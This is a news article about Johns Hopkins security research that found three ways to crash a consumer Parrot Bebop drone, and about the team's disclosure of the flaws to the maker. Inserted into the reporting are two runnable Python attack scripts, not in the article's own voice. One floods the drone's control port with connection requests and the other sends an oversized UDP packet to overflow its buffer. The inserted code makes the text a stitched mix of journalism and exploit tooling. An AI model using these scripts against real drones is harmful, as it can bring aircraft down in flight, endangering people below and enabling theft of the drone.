A Johns Hopkins University computer security team says it is raising concerns about how easily hackers could cause consumer unmanned aircraft systems (UAS) to ignore their human controllers and crash.
Five computer science graduate students and their professor have discovered three different ways to send rogue commands from a laptop to interfere with an airborne hobby drone’s normal operation and then land it or send it plummeting. In the university’s video footage of the tests, a Parrot Bebop model is used.
“You see it with a lot of new technology,” explains Lanier A. Watkins, who supervised the recent drone research at Johns Hopkins’ Homewood, Md., campus. “Security is often an afterthought. The value of our work is in showing that the technology in these drones is highly vulnerable to hackers.”
Watkins is a senior cyber security research scientist at the university’s Whiting School of Engineering. He also holds appointments with the Johns Hopkins Applied Physics Laboratory and the Johns Hopkins Information Security Institute.
During the past school year, Watkins’ master’s degree students were required to apply what they’d learned about information security by completing a capstone project. Watkins suggested they do wireless network penetration testing on a consumer UAS and, using the vulnerabilities they found, develop exploits to disrupt the process that enables a drone’s operator on the ground to manage the flight.
An exploit, explains Michael Hooper, one of the student researchers, is a “piece of software typically directed at a computer program or device to take advantage of a programming error or flaw in that device.”
In the team’s first exploit, the students bombarded a drone with about 1,000 wireless connection requests in rapid succession, each asking for control of the aircraft. This digital deluge overloaded the aircraft’s central processing unit and caused it to shut down, sending the drone into what the team described as an uncontrolled landing.
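The rapid-fire connection flood described above can be sketched, for illustration only, in Python. The article does not disclose the drone's actual address, control port, or request format, so the `DRONE_IP`, `DRONE_PORT`, and `CONNECT` payload below are hypothetical stand-ins, not the Bebop's real protocol.

```python
import socket

DRONE_IP = "192.168.1.1"   # hypothetical: a typical Wi-Fi access-point address
DRONE_PORT = 44444         # hypothetical control port

def build_connect_requests(n: int) -> list[bytes]:
    """Build n distinct connection-request payloads (illustrative format)."""
    return [f"CONNECT session={i}\r\n".encode() for i in range(n)]

def flood(host: str, port: int, n: int = 1000) -> int:
    """Open n connections in rapid succession; return how many sends succeeded.

    Each iteration opens a fresh connection, mirroring the ~1,000 separate
    requests for control that the students sent the drone.
    """
    sent = 0
    for payload in build_connect_requests(n):
        try:
            with socket.create_connection((host, port), timeout=0.05) as s:
                s.sendall(payload)
                sent += 1
        except OSError:
            pass  # target unreachable, or its CPU is already saturated
    return sent

if __name__ == "__main__":
    print(flood(DRONE_IP, DRONE_PORT))
```

The point of the sketch is volume, not cleverness: each request is cheap for the attacker but forces the drone's processor to do connection-handling work, and enough of them in quick succession can exhaust it.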
In the second hack, the team sent the drone an exceptionally large data packet that exceeded the capacity of a buffer in the aircraft’s flight application. Again, this caused the drone to crash.
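A minimal sketch of that second attack, assuming a UDP command channel and a guessed receive-buffer size (the article gives neither; `ASSUMED_BUFFER`, the address, and the port are all hypothetical):

```python
import socket

DRONE_IP = "192.168.1.1"   # hypothetical drone address
CMD_PORT = 44444           # hypothetical command port
ASSUMED_BUFFER = 4096      # hypothetical size of the flight app's receive buffer

def build_oversized_packet(buffer_size: int, overflow: int = 1024) -> bytes:
    """Build a payload deliberately larger than the assumed receive buffer."""
    return b"\x41" * (buffer_size + overflow)

def send_oversized(host: str, port: int) -> int:
    """Fire one oversized UDP datagram at the target; return bytes handed to the OS."""
    payload = build_oversized_packet(ASSUMED_BUFFER)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        return s.sendto(payload, (host, port))
```

If the receiving application copies the datagram into a fixed-size buffer without checking its length, the excess bytes overwrite adjacent memory, which is consistent with the crash the team reported.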
For the third exploit, the researchers repeatedly sent fake packets from their laptop to the drone’s controller, each claiming that the packet’s sender was the drone itself. Eventually, the researchers said, the drone’s controller started to believe that the packet sender was indeed the aircraft. The controller severed its own contact with the drone, which eventually made an emergency landing.
“We found three points that were actually vulnerable, and they were vulnerable in a way that we could actually build exploits for,” Watkins explains. “We demonstrated here that not only could someone remotely force the drone to land, but they could also remotely crash it in their yard and just take it.”
In accordance with university policy, the researchers described their drone exploit findings in a vulnerability disclosure package and sent it earlier this year to the maker of the drone that was tested. By the end of May, the company had not responded to the findings. More recently, says the university, the researchers began testing higher-priced drone models to see if these devices are similarly vulnerable to hacking.
Watkins says he hopes the studies serve as a wake-up call so that future drones will leave the factories with enhanced security features already on board and not rely on later bug fixes.
Photo courtesy of Will Kirk/Johns Hopkins University: Lanier A. Watkins, left, and Michael Hooper, right